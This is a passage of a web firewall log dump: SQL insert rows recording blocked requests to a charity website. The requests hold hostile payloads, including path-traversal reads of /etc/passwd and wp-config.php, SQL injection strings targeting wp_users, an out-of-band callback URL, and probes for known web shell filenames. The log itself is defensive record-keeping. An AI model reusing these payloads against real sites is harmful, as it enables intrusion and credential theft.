Safari\\/537.36\"}','fmagVX1JItBRZb6zH2WSylnh',0,1674574224.7809,98,'','GET',403,0,700,0,1,'',0),('167.99.15.144',2808287120,'','https://www.equalitywalk.org.uk/about.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','yedkGYHjDrlESXtgM6LV1sOv',0,1674574225.2849,97,'','POST',403,0,700,0,1,'',0),('103.45.69.101',1731020133,'','https://equalitywalk.org.uk/cgi-bin/moon.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit\\/533.4 (KHTML, like Gecko) Chrome\\/5.0.375.99 Safari\\/533.4\",\"2\":\"http:\\/\\/equalitywalk.org.uk\\/cgi-bin\\/moon.php\"}','ctsqFXU9WY8IC1JV4QDfGlNa',0,1674586046.6022,136,'','GET',403,0,700,0,1,'',0),('51.79.55.183',860829623,'','https://equalitywalk.org.uk/wp-includes/js/tinymce/skins/lightgray/fonts/index.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit\\/533.4 (KHTML, like Gecko) Chrome\\/5.0.375.99 Safari\\/533.4\",\"2\":\"http:\\/\\/equalitywalk.org.uk\\/wp-includes\\/js\\/tinymce\\/skins\\/lightgray\\/fonts\\/index.php\"}','N26zQU4udgiyvZ5V3DOrcq0j',0,1674592347.6716,118,'','GET',403,0,700,0,1,'',0),('108.167.151.65',1822922561,'','https://equalitywalk.org.uk/radio.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit\\/533.4 (KHTML, like Gecko) Chrome\\/5.0.375.99 Safari\\/533.4\",\"2\":\"http:\\/\\/equalitywalk.org.uk\\/radio.php\"}','kGuOxKZDc9LVsFU6WPhoEf8g',0,1674601786.7646,110,'','GET',403,0,700,0,1,'',0),('179.43.176.20',3005984788,'','https://equalitywalk.org.uk/wp-swimteam/include/user/download.php?file=/etc/passwd&filename=../../../wp-config.php','','{\"1\":\"Go-http-client\\/1.1\"}','eI0nSsZCDvKo7TfiLP1mwYJy',0,1674615670.6531,772,'','GET',403,0,700,0,1,'',0),('128.199.26.217',2160532185,'','https://www.equalitywalk.org.uk/about.php?673435=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','J9VkHUf8iThWmoyvdDxYpwIq',0,1674622873.0980,165,'','GET',403,0,700,0,1,'',0),('128.199.254.91',2160590427,'','https://www.equalitywalk.org.uk/about.php?673435=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','x8IdwfA7V92J1lsCqRYTL6Q3',0,1674622873.6715,118,'','GET',403,0,700,0,1,'',0),('128.199.26.217',2160532185,'','https://www.equalitywalk.org.uk/about.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','3Gn1AZTOJhF9td0S2uXrPRga',0,1674622873.8889,94,'','POST',403,0,700,0,1,'',0),('128.199.254.91',2160590427,'','https://www.equalitywalk.org.uk/about.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','fJK6kGPlv1NTVeStQ8UhOd9n',0,1674622874.5715,107,'','POST',403,0,700,0,1,'',0),('91.134.248.249',1535572217,'','https://equalitywalk.org.uk/wp-admin/css/index.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit\\/533.4 (KHTML, like Gecko) Chrome\\/5.0.375.99 Safari\\/533.4\",\"2\":\"http:\\/\\/equalitywalk.org.uk\\/wp-admin\\/css\\/index.php\"}','4k6gGIiQlZyzaMdpE3PRHJb7',0,1674630791.9925,160,'','GET',403,0,700,0,1,'',0),('192.185.83.83',3233370963,'','https://equalitywalk.org.uk/wp-includes/fonts/index.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit\\/533.4 (KHTML, like Gecko) Chrome\\/5.0.375.99 Safari\\/533.4\",\"2\":\"http:\\/\\/equalitywalk.org.uk\\/wp-includes\\/fonts\\/index.php\"}','yhoW52sbkPxeQqpErMGOLIdl',0,1674640302.1396,169,'','GET',403,0,700,0,1,'',0),('91.134.248.249',1535572217,'','https://equalitywalk.org.uk/wp-includes/SimplePie/index.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit\\/533.4 (KHTML, like Gecko) Chrome\\/5.0.375.99 Safari\\/533.4\",\"2\":\"http:\\/\\/equalitywalk.org.uk\\/wp-includes\\/SimplePie\\/index.php\"}','mboNBrk6y3fx5qgV0hAO1Cnj',0,1674641504.0433,125,'','GET',403,0,700,0,1,'',0),('103.28.36.106',1729897578,'','https://www.equalitywalk.org.uk/wordpress/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:44.0) Gecko\\/20100101 Firefox\\/44.0\"}','CeEF2JNYs3Hxb6BmSGwD0g14',0,1674646347.8433,108,'','POST',403,0,700,0,1,'',0),('103.28.36.106',1729897578,'','https://www.equalitywalk.org.uk/wp/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:44.0) Gecko\\/20100101 Firefox\\/44.0\"}','ENzli4LOKv3cJZBRDoeGxwAa',0,1674646348.7283,87,'','POST',403,0,700,0,1,'',0),('185.65.134.166',3108079270,'','https://www.equalitywalk.org.uk/?item_id=0+union+select+sleep(5)+--+g&rest_route=/wc/v3/wishlist/remove_product/1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.77 Safari\\/537.36\"}','VGUILctPCk04h96yE3MYnRml',0,1674651544.9877,1085,'','GET',403,0,520,0,1,'',0),('185.65.134.166',3108079270,'','https://www.equalitywalk.org.uk/?rest_route=/olistener/new','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/53.0.2820.59 Safari\\/537.36\"}','t4wN1mZPFbJAV8xpTiEjXGDU',0,1674651545.5539,1027,'','POST',403,0,520,0,1,'',0),('185.65.134.166',3108079270,'','https://www.equalitywalk.org.uk/?cffaction=get_data_from_database&query=SELECT%20*%20from%20wp_users','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/35.0.3319.102 Safari\\/537.36\"}','ZUrwbVdGg81vQLDe60MmxXpt',0,1674651545.7977,887,'','GET',403,0,700,0,1,'',0),('185.65.134.166',3108079270,'','https://www.equalitywalk.org.uk/forum?subscribe_topic=1+union+select+1+and+sleep(6)','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/35.0.3319.102 Safari\\/537.36\"}','EMFJ7mRWBtyevC3IZ5l1Ajcb',0,1674651546.4336,983,'','GET',403,0,700,0,1,'',0),('185.65.134.166',3108079270,'','https://www.equalitywalk.org.uk/?pid=0&uid=0&url=test&visitorId=1331\'+and+sleep(5)+or+\'&wmcAction=wmcTrack','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/54.0.2866.71 Safari\\/537.36\"}','sPUZVp2R1tQwBTvoDnYHrJOq',0,1674651546.4417,998,'','GET',403,0,700,0,1,'',0),('185.65.134.166',3108079270,'','https://www.equalitywalk.org.uk/wp-json/am-member/license','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2225.0 Safari\\/537.36\"}','P9lsqAfyuOmeJk5xd73z6rHL',0,1674651546.5931,1263,'','POST',403,0,700,0,1,'',0),('185.65.134.166',3108079270,'','https://www.equalitywalk.org.uk/?post_ids=0)+union+select+md5(999999999)%2cnull%2cnull+--+g&rest_route=/pvc/v1/increase/1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2224.3 Safari\\/537.36\"}','ZSkGTEhFHa0vWofnq7DC1zYi',0,1674651547.2071,974,'','GET',403,0,520,0,1,'',0),('185.65.134.166',3108079270,'','https://www.equalitywalk.org.uk/my-account/?alg_wc_ev_verify_email=eyJpZCI6MSwiY29kZSI6MH0=','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/40.0.2214.93 Safari\\/537.36\"}','gChAFycG7xbHaeqsOPN5p64J',0,1674651547.9858,1151,'','GET',403,0,700,0,1,'',0),('185.65.134.166',3108079270,'','https://www.equalitywalk.org.uk/index.php?rest_route=/xs-donate-form/payment-redirect/3','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/53.0.2820.59 Safari\\/537.36\"}','5If3rW9ptgMYzGQ4u1VhEOkC',0,1674651548.4614,1389,'','GET',403,0,520,0,1,'',0),('185.65.134.166',3108079270,'','https://www.equalitywalk.org.uk/index.php/video?dl=aHR0cDovL2ludGVyYWN0LnNoLw==','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.67 Safari\\/537.36\"}','WVScm8zMwurso3ZjKRGNvQxq',0,1674651549.1732,1224,'','GET',403,0,700,0,1,'',0),('185.65.134.166',3108079270,'','https://www.equalitywalk.org.uk/?rest_route=/notificationx/v1/analytics','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/49.0.2656.18 Safari\\/537.36\"}','vQHd7bKOgt0WNshCiwY3ATJ1',0,1674651549.3579,1171,'','POST',403,0,520,0,1,'',0),('185.65.134.166',3108079270,'','https://www.equalitywalk.org.uk/?rest_route=/wpgmza/v1/markers&filter=%7b%7d&fields=%2a%20from%20wp_users--%20-','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/37.0.2049.0 Safari\\/537.36\"}','NhcQVq7CejZILiAxpX6813OG',0,1674651549.2891,1250,'','GET',403,0,520,0,1,'',0),('185.65.134.166',3108079270,'','https://www.equalitywalk.org.uk/?qtproxycall=http://cf8if629k8i00ko00010dc7m6oicytmxd.oast.pro','','{\"1\":\"Mozilla\\/5.0 (Windows NT 4.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/37.0.2049.0 Safari\\/537.36\"}','ZTakKPjY2XCVLvfpsuoFJRci',0,1674651549.5347,1280,'','GET',403,0,700,0,1,'',0),('185.65.134.166',3108079270,'','https://www.equalitywalk.org.uk/','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2228.0 Safari\\/537.36\"}','hyMeawCOHoqGmAg625Qf3pzW',0,1674651549.3556,1521,'','POST',403,0,700,0,1,'',0),('185.65.134.166',3108079270,'','https://www.equalitywalk.org.uk/wp-json/visualizer/v1/upload-data','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/34.0.1847.137 Safari\\/4E423F\"}','NomuBCKsTWd8S79Ik6VcFGEh',0,1674651549.9569,955,'','POST',403,0,700,0,1,'',0),('185.65.134.166',3108079270,'','https://www.equalitywalk.org.uk/','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2228.0 Safari\\/537.36\"}','IVSz3ts2HkWi4OdyuJQpBxnU',0,1674651549.5778,1393,'','POST',403,0,700,0,1,'',0),('185.65.134.166',3108079270,'','https://www.equalitywalk.org.uk/?alg_wc_ev_verify_email=eyJpZCI6MSwiY29kZSI6MH0=','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.4; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2225.0 Safari\\/537.36\"}','mZGOA3lFhQXKJxzUWopyCI7e',0,1674651549.5819,1572,'','GET',403,0,700,0,1,'',0),('185.65.134.166',3108079270,'','https://www.equalitywalk.org.uk/wp-comments-post.php','','{\"1\":\"Mozilla\\/5.0 (X11; OpenBSD i386) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','5VkhXCPbOjB0ZWSed1lFm34T',0,1674651553.2117,1404,'','POST',403,0,700,0,1,'',0),('91.134.248.249',1535572217,'','https://equalitywalk.org.uk/wp-readme.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit\\/533.4 (KHTML, like Gecko) Chrome\\/5.0.375.99 Safari\\/533.4\",\"2\":\"http:\\/\\/equalitywalk.org.uk\\/wp-readme.php\"}','br2AtydFuQ0sxUvjfKZYTVMX',0,1674655140.3454,144,'','GET',403,0,700,0,1,'',0),('20.231.18.49',350687793,'','https://www.equalitywalk.org.uk/wp-plain.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','J7v68yZPNC9Kc5Qe0MzLIldw',0,1674656774.9257,1544,'','GET',403,0,700,0,1,'',0),('20.231.18.49',350687793,'','https://www.equalitywalk.org.uk/D2c5D.php?cpts=vz','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','Mxb5US2vZK73Tg4fCn80OyrH',0,1674656795.4617,1539,'','GET',403,0,700,0,1,'',0),('20.231.18.49',350687793,'','https://www.equalitywalk.org.uk//wp-plain.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','XSAvsz3an6OEDIcV1ltrPy2d',0,1674656801.3978,1550,'','POST',403,0,700,0,1,'',0),('20.231.18.49',350687793,'','https://www.equalitywalk.org.uk//D2c5D.php?cpts=vz','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','fePBIcJqdOFExaMZrQl2zUgh',0,1674656807.5403,1555,'','GET',403,0,700,0,1,'',0),('162.241.27.55',2733710135,'','https://equalitywalk.org.uk/wp-includes/fonts/index.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit\\/533.4 (KHTML, like Gecko) Chrome\\/5.0.375.99 Safari\\/533.4\",\"2\":\"http:\\/\\/equalitywalk.org.uk\\/wp-includes\\/fonts\\/index.php\"}','SaCr0qBjoNvcW3dbPMVJisUH',0,1674659575.8799,137,'','GET',403,0,700,0,1,'',0),('20.231.18.49',350687793,'','https://www.equalitywalk.org.uk/wp-plain.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','uERoUQxispC0AdFwbY5GZM2g',0,1674671315.3318,117,'','GET',403,0,700,0,1,'',0),('20.231.18.49',350687793,'','https://www.equalitywalk.org.uk/7edCF.php?cpts=vz','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','N9kwF3o8s4pM56TuADac0YSz',0,1674671324.4473,145,'','GET',403,0,700,0,1,'',0),('20.231.18.49',350687793,'','https://www.equalitywalk.org.uk/wp-plain.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','21TKiqaJCkFWnfxbOULudpIV',0,1674671330.2858,96,'','POST',403,0,700,0,1,'',0),('20.231.18.49',350687793,'','https://www.equalitywalk.org.uk/7edCF.php?cpts=vz','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','vT5tHIBx4RdJghX70Yi8DGVz',0,1674671335.2815,103,'','GET',403,0,700,0,1,'',0),('182.2.36.24',3053593624,'','https://www.equalitywalk.org.uk/olux.php','','{\"1\":\"python-requests\\/2.27.1\"}','L0xQcwfpOJq1WSzAd5tvgPsG',0,1674671781.5184,156,'','GET',403,0,700,0,1,'',0),('182.2.37.20',3053593876,'','https://www.equalitywalk.org.uk/indoxploit.php','','{\"1\":\"python-requests\\/2.27.1\"}','kN6SCLGsdaYIDW7XgoEyz5bp',0,1674671789.4540,158,'','GET',403,0,700,0,1,'',0),('182.2.36.24',3053593624,'','https://www.equalitywalk.org.uk/indoxploit.php','','{\"1\":\"python-requests\\/2.27.1\"}','9uDVKyrLpStZmw8ePf5sU4jq',0,1674671795.4445,99,'','GET',403,0,700,0,1,'',0),('182.2.37.20',3053593876,'','https://www.equalitywalk.org.uk/wso.php','','{\"1\":\"python-requests\\/2.27.1\"}','kzBjQcap8XY9JEH2dLwIty1b',0,1674671802.3284,98,'','GET',403,0,700,0,1,'',0),('182.2.37.20',3053593876,'','https://www.equalitywalk.org.uk/up.php','','{\"1\":\"python-requests\\/2.27.1\"}','keGtmBdTsf2PnoIa9CphSRy5',0,1674671871.9993,103,'','GET',403,0,700,0,1,'',0),('182.2.37.8',3053593864,'','https://www.equalitywalk.org.uk/upload.php','','{\"1\":\"python-requests\\/2.27.1\"}','Ye2hoEt6SqjxWwi3RnlHbfJk',0,1674671879.9244,117,'','GET',403,0,700,0,1,'',0),('182.2.37.8',3053593864,'','https://www.equalitywalk.org.uk/shell.php','','{\"1\":\"python-requests\\/2.27.1\"}','aZUYVR8jL1z5mB3lFxwKyurP',0,1674671884.9911,111,'','GET',403,0,700,0,1,'',0),('3.26.169.116',52078964,'','https://www.equalitywalk.org.uk/shell4.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','IAGMhb7jVOKr8fzse0u3R9kZ',0,1674673772.8753,128,'','GET',403,0,700,0,1,'',0),('3.26.169.116',52078964,'','https://www.equalitywalk.org.uk/ups.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','VlKQMIvqTRAUstXGaum7fk3z',0,1674673774.9596,113,'','GET',403,0,700,0,1,'',0),('3.26.169.116',52078964,'','https://www.equalitywalk.org.uk/ru.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','Nar63i9BY54FD0OjfynJsk2I',0,1674673777.2186,143,'','GET',403,0,700,0,1,'',0),('3.26.169.116',52078964,'','https://www.equalitywalk.org.uk/if.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','EqBgS3Wev0GuiTQJlxbkMjdU',0,1674673779.2989,94,'','GET',403,0,700,0,1,'',0),('3.26.169.116',52078964,'','https://www.equalitywalk.org.uk/vuln.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','aG3n7BmUloKiP1cO5fTrY0ZE',0,1674673781.3538,142,'','GET',403,0,700,0,1,'',0),('3.26.169.116',52078964,'','https://www.equalitywalk.org.uk/fw.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','c1klWjDA0RwmBO68ZbunPV2I',0,1674673783.5310,106,'','GET',403,0,700,0,1,'',0),('3.26.169.116',52078964,'','https://www.equalitywalk.org.uk/skipper.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','AQyKcFd96XfNksu4xUtVWvOb',0,1674673785.6015,129,'','GET',403,0,700,0,1,'',0),('3.26.169.116',52078964,'','https://www.equalitywalk.org.uk/skippershell.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','wChD4nX2Y67kNBFtJUE3lySm',0,1674673787.6777,128,'','GET',403,0,700,0,1,'',0),('3.26.169.116',52078964,'','https://www.equalitywalk.org.uk/tttt.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','GXZaT6lE3UPvdNpAY07FsjJH',0,1674673789.7468,112,'','GET',403,0,700,0,1,'',0),('3.26.169.116',52078964,'','https://www.equalitywalk.org.uk/tshop.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','oCQMu1t9VnI5jc30zXUENKkf',0,1674673791.8375,213,'','GET',403,0,700,0,1,'',0),('3.26.169.116',52078964,'','https://www.equalitywalk.org.uk/alfa.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','u12kz8XFJ3cwBR9AfVoNPyIx',0,1674673794.0823,112,'','GET',403,0,700,0,1,'',0),('3.26.169.116',52078964,'','https://www.equalitywalk.org.uk/shell.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','n8tP1SgL9rwCcY0ROf7MNs4q',0,1674673796.1516,137,'','GET',403,0,700,0,1,'',0),('3.26.169.116',52078964,'','https://www.equalitywalk.org.uk/inje3ctor.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','XH9IhjVg0EkSpcfAztiF8wNy',0,1674673798.2085,97,'','GET',403,0,700,0,1,'',0),('3.26.169.116',52078964,'','https://www.equalitywalk.org.uk/saudi.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','sLB8DnVdSWqo0Uc34MHZKN1h',0,1674673800.2418,162,'','GET',403,0,700,0,1,'',0),('3.26.169.116',52078964,'','https://www.equalitywalk.org.uk/wso.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','PtxsqYX6wHJgjFeGZQMuVAI4',0,1674673802.3680,112,'','GET',403,0,700,0,1,'',0),('3.26.169.116',52078964,'','https://www.equalitywalk.org.uk/alfashell.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','TASOvaV9UlufmN3IKJLZBznH',0,1674673804.4248,95,'','GET',403,0,700,0,1,'',0),('3.26.169.116',52078964,'','https://www.equalitywalk.org.uk/my_alfa.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','y2wElhQMovFxOI6RYJnGTkLD',0,1674673806.4824,146,'','GET',403,0,700,0,1,'',0),('3.26.169.116',52078964,'','https://www.equalitywalk.org.uk/uploader.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','pB8C4lRzw2ajUVQ9FbTiLqJ7',0,1674673808.6180,115,'','GET',403,0,700,0,1,'',0),('3.26.169.116',52078964,'','https://www.equalitywalk.org.uk/up.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','YcoBizTW5r8mAd0y9DQ6JVUX',0,1674673810.6918,104,'','GET',403,0,700,0,1,'',0),('3.26.169.116',52078964,'','https://www.equalitywalk.org.uk/hacked.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','owX0AUOqkPDiEuygJ6NFn3VH',0,1674673812.9809,150,'','GET',403,0,700,0,1,'',0),('3.26.169.116',52078964,'','https://www.equalitywalk.org.uk/c99.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','8CFOqvyjSoGLBw91lHhsQpu6',0,1674673815.0862,126,'','GET',403,0,700,0,1,'',0),('3.26.169.116',52078964,'','https://www.equalitywalk.org.uk/priv8.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','CK3NAWhTuxmPU4sFgXISaqM0',0,1674673817.1474,95,'','GET',403,0,700,0,1,'',0),('3.26.169.116',52078964,'','https://www.equalitywalk.org.uk/Navir.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','ucRHrGLtjn3hSDmC6Ub4qP1g',0,1674673819.1832,96,'','GET',403,0,700,0,1,'',0),('3.26.169.116',52078964,'','https://www.equalitywalk.org.uk/cmd13.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','GpDT168HAIbQCZLWR2UNniqx',0,1674673821.2133,106,'','GET',403,0,700,0,1,'',0),('3.26.169.116',52078964,'','https://www.equalitywalk.org.uk/inc20k1.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','s3rLnwhxlBMGCRQ469SkEPf0',0,1674673823.2964,89,'','GET',403,0,700,0,1,'',0),('3.26.169.116',52078964,'','https://www.equalitywalk.org.uk/1index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','NPUkhHX9KlI7dVwm4SbBELC2',0,1674673825.3447,114,'','GET',403,0,700,0,1,'',0),('3.26.169.116',52078964,'','https://www.equalitywalk.org.uk/404.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','REz9hcraylU6FeQBXvN2Ciqj',0,1674673827.4484,128,'','GET',403,0,700,0,1,'',0),('3.26.169.116',52078964,'','https://www.equalitywalk.org.uk/swm.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 